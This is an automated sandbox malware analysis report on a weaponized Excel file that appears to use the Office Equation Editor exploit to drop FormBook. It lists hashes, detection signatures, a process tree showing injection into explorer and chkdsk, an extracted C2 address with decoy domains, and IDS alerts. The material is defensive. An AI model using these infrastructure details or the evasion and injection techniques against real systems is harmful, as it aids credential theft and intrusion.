
Windows Analysis Report
RFQ-T56797W_1.xlsx

Overview

General Information

Sample Name: RFQ-T56797W_1.xlsx
Analysis ID: 1342301
MD5: 138d7d8a55bef05ac6368488b3c9630d
SHA1: f9e93ed382d3005a7575443369207f2c3339309b
SHA256: 25e7a5ff8ca830bccda9a6617b31fb3992d4f780444cf3adc8cfb8056f26dd58
Tags: xlsx

Detection

FormBook, NSISDropper
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected NSISDropper
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Sigma detected: File Dropped By EQNEDT32EXE
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Shellcode detected
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Sample uses process hollowing technique
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Found decision node followed by non-executed suspicious APIs
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Document misses a certain OLE stream usually present in this Microsoft Office document type
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Office Equation Editor has been started
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2028 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 260 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • word.exe (PID: 2204 cmdline: C:\Users\user\AppData\Roaming\word.exe MD5: AFFC03992E31B5D4324B41CBD40D911E)
      • oktuxvhtsq.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" MD5: CF92A3EC74E407574A58BCF121BEC4F1)
        • oktuxvhtsq.exe (PID: 1516 cmdline: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe MD5: CF92A3EC74E407574A58BCF121BEC4F1)
          • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
            • autochk.exe (PID: 2148 cmdline: C:\Windows\SysWOW64\autochk.exe MD5: F88A52EB62019D6A62FDD9E08034DBD8)
            • chkdsk.exe (PID: 2052 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: A01E18A156825557A24A643A2547AA8C)
              • cmd.exe (PID: 1932 cmdline: /c del "C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

{"C2 list": ["www.fakeittilyoumakeitfinance.com/ge06/"], "decoy": ["azaharparis.com", "nationaleventsafety.com", "covesstudy.com", "quinshon4.com", "moderco.net", "trailblazerbaby.com", "time-edu.net", "azeemtourism.com", "anakmedan3.click", "bookinternationaltours.com", "ulksht.top", "newswirex.com", "dingg.net", "waveoflife.pro", "miamirealestatecommercial.com", "rtplive77.xyz", "bowllywood.com", "automation-tools-84162.bond", "booptee.com", "ebx.lat", "gdlongzhong.icu", "seoulbeautytw.com", "bulgarianarchive.com", "pojipoji.com", "mochibees-wylie.com", "ecoboat.world", "eroyfw.top", "centralngs.com", "youtube-manager.site", "eatlust.com", "geutik.cfd", "credit-cards-16215.bond", "lodsoab.com", "jon188.ink", "52iwin.win", "juanmafit.com", "gamemuggaz.com", "oneresi.com", "pj69vip12.cyou", "west-paws.com", "chaineccn.com", "mentiti.com", "modeparisiennefr.com", "skyboxpro.net", "versebuild.xyz", "luxpsy.com", "nivaarnalawgroup.com", "c091627.com", "preppal.shop", "narrativepages.com", "yqsoysy.com", "diverseindiatours.com", "batcavela.com", "ayyp300.top", "daqtpt.cfd", "livers-guardplus.com", "chucobuilt.net", "qianxz109.xyz", "carat-automotive.com", "hndswicco.best", "workwithray.live", "sxchenggu.com", "sanpan010.com", "fufe066.xyz"]}
Yara matches on the document (Source: Rule (Description; Author); Strings)

sheet1.xml: INDICATOR_XML_LegacyDrawing_AutoLoad_Document (detects AutoLoad documents using LegacyDrawing; ditekSHen)
  • 0x1bb:$s1: <legacyDrawing r:id="
  • 0x1e3:$s2: <oleObject progId="
  • 0x22b:$s3: autoLoad="true"
Yara matches on memory dumps (Source: Rule (Description; Author))

00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp: JoeSecurity_FormBook (Yara detected FormBook; Joe Security)
00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp: JoeSecurity_FormBook_1 (Yara detected FormBook; Joe Security)
00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp: Windows_Trojan_Formbook_1112e116 (unknown; unknown)
00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp: Formbook_1 (autogenerated rule brought to you by yara-signator; Felix Bilstein - yara-signator at cocacoding dot com)
00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp: Formbook (detect Formbook in memory; JPCERT/CC Incident Response Group)
Yara matches on unpacked PEs (Source: Rule (Description; Author))

7.2.oktuxvhtsq.exe.400000.2.unpack: JoeSecurity_FormBook (Yara detected FormBook; Joe Security)
7.2.oktuxvhtsq.exe.400000.2.unpack: JoeSecurity_FormBook_1 (Yara detected FormBook; Joe Security)
7.2.oktuxvhtsq.exe.400000.2.unpack: Windows_Trojan_Formbook_1112e116 (unknown; unknown)
7.2.oktuxvhtsq.exe.400000.2.unpack: Formbook_1 (autogenerated rule brought to you by yara-signator; Felix Bilstein - yara-signator at cocacoding dot com)
7.2.oktuxvhtsq.exe.400000.2.unpack: Formbook (detect Formbook in memory; JPCERT/CC Incident Response Group)

          Exploits

          Sigma: Network Connection; Author: Joe Security; Data: DestinationIp: 41.185.64.155, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 260, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
          Sigma: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 260, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\jakatrol2.1[1].exe
          Snort IDS alerts

          Timestamp                 Source IP      Destination IP    Src Port  Dst Port  Protocol  SID      Classtype
          11/14/23-13:28:23.777818  192.168.2.22   38.11.36.68       49167     80        TCP       2031412  A Network Trojan was detected
          11/14/23-13:28:02.320328  192.168.2.22   91.195.240.19     49166     80        TCP       2031412  A Network Trojan was detected
          11/14/23-13:27:01.556896  192.168.2.22   103.224.212.212   49164     80        TCP       2031412  A Network Trojan was detected
          11/14/23-13:28:45.165462  192.168.2.22   3.33.130.190      49168     80        TCP       2031412  A Network Trojan was detected
          11/14/23-13:29:05.883659  192.168.2.22   34.149.87.45      49169     80        TCP       2031412  A Network Trojan was detected
          11/14/23-13:26:24.263209  192.168.2.22   41.185.64.155     49162     80        TCP       2021697  A Network Trojan was detected


          AV Detection

          Source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp; Malware Configuration Extractor: FormBook (configuration listed above)
          Source: RFQ-T56797W_1.xlsx; ReversingLabs: Detection: 63%
          Source: RFQ-T56797W_1.xlsx; Virustotal: Detection: 54%
          Source: Yara match; file source: 7.2.oktuxvhtsq.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match; file source: 6.2.oktuxvhtsq.exe.260000.0.unpack, type: UNPACKEDPE
          Source: Yara match; file source: 6.2.oktuxvhtsq.exe.260000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match; file source: 7.2.oktuxvhtsq.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match; file source: 00000006.00000002.411942593.0000000000260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; file source: 00000007.00000002.420688853.0000000000430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; file source: 00000007.00000002.420683321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; file source: 00000007.00000002.420828073.0000000002280000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; file source: 0000000A.00000002.849613102.0000000000320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match; file source: 0000000A.00000002.849544062.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match; file source: 0000000A.00000002.849597547.00000000002F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: RFQ-T56797W_1.xlsx; Avira: detected
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe; Joe Sandbox ML: detected

          Exploits

          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\word.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Network connect: IP: 41.185.64.155 Port: 80
          Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: chkdsk.pdb source: oktuxvhtsq.exe, 00000007.00000002.420661230.0000000000240000.00000040.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420667702.0000000000274000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849693334.00000000005E0000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: oktuxvhtsq.exe, oktuxvhtsq.exe, 00000007.00000003.411866541.0000000000430000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420725396.00000000008A0000.00000040.00001000.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000003.412146879.0000000000590000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000007.00000002.420725396.0000000000720000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 0000000A.00000003.420901641.0000000001D10000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849798315.0000000002000000.00000040.00001000.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000003.421285502.0000000001E70000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849798315.0000000002180000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: D:\xampp\htdocs\d97f8e9e1ea74988993ee47b9f946ba8\Loader\Release\Loader.pdb source: word.exe, 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415689010.0000000002390000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000006.00000000.410185124.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000007.00000000.411311230.000000000042E000.00000002.00000001.01000000.00000006.sdmp, explorer.exe, 00000008.00000002.851097210.000000000870F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849622577.00000000003A3000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000024FF000.00000004.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe.5.dr
          Source: Binary string: D:\xampp\htdocs\d97f8e9e1ea74988993ee47b9f946ba8\Loader\Release\Loader.pdb& source: word.exe, 00000005.00000002.415627380.000000000040B000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.415689010.0000000002390000.00000004.00000020.00020000.00000000.sdmp, oktuxvhtsq.exe, 00000006.00000002.411963264.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000006.00000000.410185124.000000000042E000.00000002.00000001.01000000.00000006.sdmp, oktuxvhtsq.exe, 00000007.00000000.411311230.000000000042E000.00000002.00000001.01000000.00000006.sdmp, explorer.exe, 00000008.00000002.851097210.000000000870F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.849622577.00000000003A3000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 0000000A.00000002.850024421.00000000024FF000.00000004.10000000.00040000.00000000.sdmp, oktuxvhtsq.exe.5.dr
          Source: C:\Users\user\AppData\Roaming\word.exe; Code function: 5_2_00405E93 FindFirstFileA,FindClose
          Source: C:\Users\user\AppData\Roaming\word.exe; Code function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA
          Source: C:\Users\user\AppData\Roaming\word.exe; Code function: 5_2_00402671 FindFirstFileA
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe; Code function: 6_2_004016D0 FindFirstFileW,FindNextFileW,FindClose
          Source: C:\Users\user\AppData\Local\Temp\oktuxvhtsq.exe; Code function: 6_2_0042478A FindFirstFileExW

          Software Vulnerabilities

          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_036BBABB ExitProcess
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_036BBA9B WinExec,ExitProcess
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_036BB92B LoadLibraryW,URLDownloadToFileW
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_036BBA50 URLDownloadToFileW
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Code function: 2_2_036BB953 URLDownloadToFileW
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 192.168.2.22:49162 -> 41.185.64.155:80
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
          Source: global trafficTCP traffic: 41.185.64.155:80 -> 192.168.2.22:49162
